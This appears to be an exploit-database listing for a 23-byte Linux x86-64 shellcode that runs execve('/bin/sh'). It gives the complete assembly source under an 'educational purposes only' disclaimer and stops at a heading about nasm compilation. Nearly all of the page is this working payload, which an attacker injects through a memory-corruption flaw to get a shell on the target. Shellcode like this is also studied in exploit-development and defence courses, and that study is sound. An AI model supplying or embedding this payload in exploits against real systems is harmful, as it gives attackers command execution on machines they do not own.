Exploits / Vulnerability Discovered : 2019-05-23 |
Type : shellcode |
Platform : linux_x86-64
This exploit / vulnerability Linux/x64 execve(/bin/sh) shellcode (23 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/*
;Category: Shellcode
;Title: GNU/Linux x86_64 - execve /bin/sh
;Author: rajvardhan
;Date: 23/05/2019
;Architecture: Linux x86_64
;Possibly The Smallest And Fully Reliable Shellcode
===========
Asm Source
===========
global _start
section .text
_start:
xor rsi,rsi
push rsi
mov rdi,0x68732f2f6e69622f
push rdi
push rsp
pop rdi
push 59
pop rax
cdq
syscall
================================
Instruction for nasm compliation
================================